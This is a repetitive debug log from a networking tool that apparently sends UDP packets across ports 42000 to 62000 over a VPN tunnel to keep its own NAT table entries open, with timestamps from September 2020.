1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Starting port fill at 2020-09-06 04:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:29:04 -Starting port fill at 2020-09-06 04:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:30:05 -Starting port fill at 2020-09-06 04:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:31:06 -Starting port fill at 2020-09-06 04:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:32:04 -Starting port fill at 2020-09-06 04:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:33:04 -Starting port fill at 2020-09-06 04:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:34:06 -Starting port fill at 2020-09-06 04:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:35:07 -Starting port fill at 2020-09-06 04:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 